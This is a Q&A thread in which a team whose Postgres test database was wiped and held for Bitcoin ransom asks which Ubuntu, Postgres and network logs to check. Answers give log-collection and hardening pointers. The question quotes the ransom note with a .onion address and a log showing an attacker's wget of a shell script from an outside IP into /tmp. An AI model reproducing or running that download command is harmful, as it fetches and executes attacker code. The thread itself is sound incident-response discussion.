# What logs to look for on Ubuntu when Postgres DB is hacked!

Tags: ubuntu, postgresql

**Updated the question title to clarify that this post is not asking the community to answer "how we got hacked" but "what logs to look for or pointers that may help our investigation". We feel that this question was down-voted because it was being misunderstood.**

Our Postgres DB was hacked and held for ransom. Hacker deleted all the tables in the DB and created a single table called "warning" with a single row asking for 0.5 BTC for giving a copy of our DB back.

We don't have any resident security expert neither any Ops guys or Linux expert or DBA.

Could anyone suggest where to begin our investigation? What log files to look for for Postgres or Ubuntu or Network?

Luckily we had a backup so we could restore our system but we still couldn't figure out how we got hacked.

Row from "warning" table. 
column: warning_text: Send 0.5 BTC to this address and go to this site http://sognd75g4isasu2v.onion/ to recover your database! SQL dump will be available after payment!

**Update: More Info**
Some more info: SSH was only was to log into this instance. However, we had all ports open, which admittedly was a mistake but we were a bit careless because it was our Test environment. Our first guess is that the default postgres db account password got hacked thru brute force but we don't know where to look for to trace that.

Postgres log files have logs like the one below which shows that some sh script was uploading the DB. But we don't know what logs to look for to trace how they hacked the password and how/when they deleted the tables in the DB and created the warning table.

--2016-12-29 01:01:25--  http://173.199.124.112:8090/mpool.sh
Connecting to 173.199.124.112:8090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1061 (1.0K) [application/x-sh]
Saving to: ‘/tmp/mpool.sh’

```
 0K .                                                     100%  249M=0s
```

2016-12-29 01:01:25 (249 MB/s) - ‘/tmp/mpool.sh’ saved [1061/1061]

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0^M100  1061  100  1061    0     0   6567      0 --:--:-- --:--:-- --:--:--  6590

Comment: Rotate creds, restore backup, good security always costs good money.  If you got hacked, then you don't have what it takes to run a service on the internet.

Comment: Just to clarify. We have already restored our system from the backup and spun out a new EC2 instance. Rotated creds and other obvious things are already done. 

We are specifically looking for pointers in terms on where we can begin investigations in our log files. What log files to look for etc.

Comment: There's no way to guess how you got hacked without more details: the Ubuntu version, the Postgres version, what language are in use, what kind of application it ran, webservers in use, authentication schemes... the list is big.

Comment: Quoted from the original question: "Could anyone suggest where to begin our investigation? What log files to look for for Postgres or Ubuntu or Network?"

Comment: @SudeepKaushik: it is really impossible to say where to start investigation without having detailed information about your setup. If the DB was reachable from outside look there, if users had SSH access with weak passwords look there, if there is some web application with maybe bugs in it look there ... In other words: the question is too broad.

Comment: Not a Real answer but a Tipp: befor using such big constructions like that, have the knowledge to secure them. If you don't have the knowledge the only way is to buy it. let a Company host this kind of server who know what they are doing. If you don't do it, this will not be the last time all you data is lost. And i can say you can't find anything useful with a very high chance. Data is lost and you have no one to blame. They will have deleted all they traces, every bot will do that.

Comment: @SteffenUllrich: Thanks Steffen, your response was useful. I have updated the post with some info that may be more specific and hopefully useful. Damage done was corrected with the backup we had but nevertheless we are trying the investigate this incident and in the process improving our knowledge. Pointers to dig around are always appreciated so thank you for that.

Comment: Thanks @Serverfrog. Your comments may be very valid and are appreciated. Asking around for ideas led us to restore the partition from the volume where the DB was sitting using "testdisk" utility on ubuntu. And guess what, we were able to restore the DB files :-) (although we already had the backup, but this was exciting!)

Answer (score 2):

That Warning is irrelevant -

The attack itself could have been through **any** weakness you have on your network, or through a phish, or a web facing service or anything.

You need to pull all your logs from:

- firewall
- routers
- host platforms
- end user systems
- database
- user/ID management systems etc

Then analyse them together to understand the timeline.

This really is a skilled forensic job though, if you want to really be sure how it happened.

You may wish instead to work through each device, wiping and hardening (eg remove default passwords, patch up todate, add security configs etc)

Comment: Thank you Rory for the collection of logs to look for. This is helpful. We know that we were at fault at leaving the DB server open on all ports but this was our test environment, so we were a bit careless. We doubt that the root was hacked since the SSH was the only way to log into the system. Most likely the default postgres user account was hacked thru brute force but we don't know where to look for traces for such a hack.

Comment: @SudeepKaushik Look at your log settings in your `/etc/postgresql.conf` file, but after looking at the documentation it looks like the value you would want enabled `log_connections` is off by default.

Comment: @RoryAlsop: Yes, by default on Postgres, most logging is off. We found some logging in the /var/logs/porstres folder and I pasted the logs we found suspicious in the original question.

Answer (score 1):

Further to what Rory says, these attacks are very common with unsecured databases exposed to the internet. I know of them happening with MongoDB's, but any database platform is possible assuming it's exposed to the internet and has weak authentication.

For a ransom of .5 BTC I'm imagining the attack vector was not sophisticated. It's unlikely they put too much time and effort into this, and it was likely automated in some form.

Now with that said :

- Take inventory of your environment. What version OS / Frameworks / languages / Web server / PostgreSQL were you running? Are there any known exploits for them? Check [expoit-db.com](http://exploit-db.com)
- What ports were open on your firewall? Was TCP 5432 exposed to the internet?
- Were remote connections allowed on the database? If so, what users were able to log in?
- What did your passwords look like? Were they complex?
- How was SSH access granted? Was root allowed remote SSH access?

I should end this by saying I have no formal experience in DFIR, however I think it can safely be assumed that this was not an overly sophisticated attack so starting with the basics would be where I would start.

Comment: Thanks DK, your comments were helpful. You may be right that the attack was not sophisticated. But this issue may be wide spread (link below) and so I feel this post should be up-voted and not-down-voted (like it is currently). https://www.bleepingcomputer.com/news/security/number-of-hijacked-mongodb-databases-is-going-up-as-more-hackers-are-flocking-in/

Comment: Sudeep - the mongo issue is people leaving the default password on... I'm assuming you didn't do that!

Comment: @RoryAlsop: No, we didn't leave the default password. Also, we are using Postgres for our DB but the hacker's message (the warning table etc) is the same.